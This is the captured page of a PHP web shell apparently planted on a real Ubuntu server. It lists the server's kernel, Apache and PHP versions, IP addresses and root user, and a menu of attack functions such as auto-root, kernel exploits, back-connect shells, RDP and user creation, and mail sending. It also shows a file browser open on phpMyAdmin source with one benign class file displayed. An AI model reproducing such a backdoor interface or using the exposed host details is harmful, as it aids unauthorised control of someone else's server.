Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
phpmyadmin /
libraries /
navigation /
nodes /
[ HOME SHELL ]
Name
Size
Permission
Action
Node.php
26.35
KB
-rw-r--r--
NodeColumn.php
1.38
KB
-rw-r--r--
NodeColumnContainer.php
1.85
KB
-rw-r--r--
NodeDatabase.php
24.16
KB
-rw-r--r--
NodeDatabaseChild.php
1.49
KB
-rw-r--r--
NodeDatabaseChildContainer.php
1.15
KB
-rw-r--r--
NodeDatabaseContainer.php
1.41
KB
-rw-r--r--
NodeEvent.php
1.48
KB
-rw-r--r--
NodeEventContainer.php
1.63
KB
-rw-r--r--
NodeFunction.php
1.57
KB
-rw-r--r--
NodeFunctionContainer.php
1.86
KB
-rw-r--r--
NodeIndex.php
1.28
KB
-rw-r--r--
NodeIndexContainer.php
1.85
KB
-rw-r--r--
NodeProcedure.php
1.61
KB
-rw-r--r--
NodeProcedureContainer.php
1.83
KB
-rw-r--r--
NodeTable.php
10.85
KB
-rw-r--r--
NodeTableContainer.php
1.75
KB
-rw-r--r--
NodeTrigger.php
1.29
KB
-rw-r--r--
NodeTriggerContainer.php
1.69
KB
-rw-r--r--
NodeView.php
1.46
KB
-rw-r--r--
NodeViewContainer.php
1.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : NodeDatabaseChildContainer.php
<?php /* vim: set expandtab sw=4 ts=4 sts=4: */ /** * Represents container node that carries children of a database * * @package PhpMyAdmin-Navigation */ namespace PMA\libraries\navigation\nodes; /** * Represents container node that carries children of a database * * @package PhpMyAdmin-Navigation */ abstract class NodeDatabaseChildContainer extends NodeDatabaseChild { /** * Initialises the class by setting the common variables * * @param string $name An identifier for the new node * @param int $type Type of node, may be one of CONTAINER or OBJECT */ public function __construct($name, $type = Node::OBJECT) { parent::__construct($name, $type); if ($GLOBALS['cfg']['NavigationTreeEnableGrouping']) { $this->separator = $GLOBALS['cfg']['NavigationTreeTableSeparator']; $this->separator_depth = (int)( $GLOBALS['cfg']['NavigationTreeTableLevel'] ); } } /** * Returns the type of the item represented by the node. * * @return string type of the item */ protected function getItemType() { return 'group'; } }
Close